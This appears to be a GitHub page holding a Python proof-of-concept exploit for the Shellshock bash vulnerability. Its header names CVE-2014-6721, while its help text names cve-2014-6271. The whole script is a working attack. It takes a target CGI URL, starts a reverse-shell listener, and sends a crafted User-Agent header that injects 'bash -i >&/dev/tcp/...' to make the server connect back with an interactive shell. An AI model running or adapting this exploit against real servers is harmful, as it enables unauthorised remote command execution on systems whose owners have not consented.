-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2014-6721-POC.py
70 lines (64 loc) · 2.9 KB
/
CVE-2014-6721-POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
import socket
import argparse
import subprocess
import sys
from requests import get
from requests.exceptions import ChunkedEncodingError
import threading
from time import sleep
# CVE-2014-6721 - Shellshock POC exploit
# In this code, we are doing few things. First, we are recieving the required arguments from the user,
# including the target url of the vulnerable cgi script, and the listening ip address and port for
# capturing the reverse shell.Then, we create a listening socket that will function as the actual reverse shell in the program.
# After that, we are sending a GET request with specially crafted User-Agent Header, that will cause a RCE in the server,
# and will send the connection back to our listening socket, as a reverse shell.
# Receiving required arguments from the user:
def GetArguments():
parser = argparse.ArgumentParser(description="Shellshock Vulnerability exploit (cve-2014-6271)")
required=parser.add_argument_group("required arguments")
required.add_argument('-u',"--url", type=str, help='target url of cgi script (example: http://www.domain.com/cgi-bin/script.cgi)'
,required=True)
required.add_argument('-l','--lhost', type=str, help='listening ip address for capturing the reverse shell',required=True)
required.add_argument('-p',"--port", type=int, help='listening port for capturing the reverse shell',required=True)
args= parser.parse_args()
return args.url, args.lhost,args.port
# Creating the lisetning socket that will function later as the reverse shell:
def reverse_shell():
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((lhost,port))
s.listen(1)
print("[*] listening on port: {0}...".format(port))
conn,addr = s.accept()
print("[*] received connection from {0}".format(addr))
while True:
output=conn.recv(2048).decode()
sys.stdout.write(output)
cmd=input()+"\n"
if(cmd=="exit"):
conn.close()
s.close()
break
conn.send(cmd.encode())
sleep(1)
sys.stdout.write("\033[A"+output.split("\n")[-1])
except KeyboardInterrupt:
conn.close()
s.close()
quit()
#calling the functions "GetArguements" and "reverse shell",and after
#that sending the crafted GET request with crafted User-Agent Header:
try:
url,lhost,port = GetArguments()
t = threading.Thread(target=reverse_shell, args=())
t.start()
sleep(2)
#this is the part of crafting and sending the GET request:
cmd="'bash -i >&/dev/tcp/{0}/{1} 0>&1'".format(lhost,port)
user_agent= {"User-Agent":"() { :; };echo; echo; /bin/bash -c "+cmd}
request=requests.get(url,headers=user_agent)
except ChunkedEncodingError:
pass
except KeyboardInterrupt:
quit()